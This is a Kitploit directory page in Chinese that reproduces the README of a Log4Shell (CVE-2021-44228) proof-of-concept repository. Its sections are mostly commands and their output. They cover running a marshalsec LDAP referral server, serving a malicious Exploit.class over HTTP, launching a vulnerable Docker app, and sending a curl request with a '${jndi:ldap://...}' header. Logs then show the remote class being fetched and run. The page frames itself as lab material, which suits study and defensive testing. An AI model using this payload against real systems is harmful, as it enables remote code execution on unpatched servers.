Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-44228 — CVE-2021-44228 的 PoC。 | Kitploit
工具/GitHubGitHub/marcourbano/cve-2021-44228
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubmarcourbano/cve-2021-44228

CVE-2021-44228

CVE-2021-44228 的 PoC。

查看仓库
7713年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4Shell POC (CVE-2021-44228)

本仓库旨在提供利用 CVE-2021-44228(绰号 Log4Shell)所需的全部组件,并演示如何利用该漏洞。

利用此漏洞所需的要素如下:

  1. 一个 LDAP 服务器,它将把存在漏洞的应用程序重定向到 exploit。
  2. 一个使用存在漏洞的 Log4J 版本的存在漏洞的应用程序(易受 CVE-2021-44228 影响的 Spring Boot Web 应用程序)。
  3. 将被存在漏洞的应用程序加载的 Java Exploit.class(以及对应的 Exploit.java 文件)。
  4. 一个 http 服务器,存在漏洞的应用程序将从该服务器下载恶意的 Exploit.class

致谢:

  • LDAP 服务器取自 mbechler 的 Marshalsec 仓库。
  • 存在漏洞的应用程序由 christophetd 提供。

先决条件:

  • Maven
  • Java
  • Docker
  • Python

运行 LDAP Server 和 HTTP Server

HTTP Server

1. 进入 exploit 文件夹,并使用 Python 启动 http 服务器。

root@kitploit:~
python3 -m http.server PORT

LDAP Server

1. 进入 ldap_server 文件夹并构建 pom.xml

root@kitploit:~
mvn clean package -DskipTests

2. 进入 target 文件夹并启动服务器,指定 http_server_ip 和 http_server_port

root@kitploit:~
java -cp ldap_server-1.0-all.jar marshalsec.jndi.LDAPRefServer "http://http_server_ip:http_server_port/#Exploit"

注意:此命令运行恶意的 ldap 服务器,强制其对每个 ldap 查询都响应 Exploit.class URI。

运行 Vulnerable application

运行存在漏洞的应用程序 docker 容器

root@kitploit:~
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

注意:默认情况下,我们在 8080 端口上运行存在漏洞的应用程序,请随意更改。

利用

一旦 vulnerable_application、ldap_server 和 http_server 都运行起来,就向存在漏洞的服务器发送一个恶意的 http 请求。

root@kitploit:~
curl VULNERABLE_APPLICATION_IP:8080 -H 'X-Api-Version: ${jndi:ldap://ldap_server_ip:1389/a}'

vulnerable_application 将记录该 payload,并执行一个 ldap 查询

root@kitploit:~
2021-12-24 18:48:14.644  INFO 1 --- [nio-8080-exec-1] HelloWorld: Received a request for API version ${jndi:ldap://10.0.2.15:1389/a}

ldap_server 将响应 Exploit.class URI

root@kitploit:~
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.0.2.15:8443/Exploit.class

http_server 将收到一个对 Exploit.class 的请求

root@kitploit:~
Serving HTTP on 0.0.0.0 port 8443 (http://0.0.0.0:8443/) ...
172.17.0.2 - - [24/Dec/2021 19:48:14] "GET /Exploit.class HTTP/1.1" 200 -

最后,我们可以检查到该 exploit 在受害者的文件系统上创建了一个新文件。在本示例中,我们需要检查 docker 容器的文件系统。

参考

https://www.lunasec.io/docs/blog/log4j-zero-day/
https://github.com/mbechler/marshalsec
https://github.com/christophetd/log4shell-vulnerable-app

贡献者

@CrashOverflow

下载工具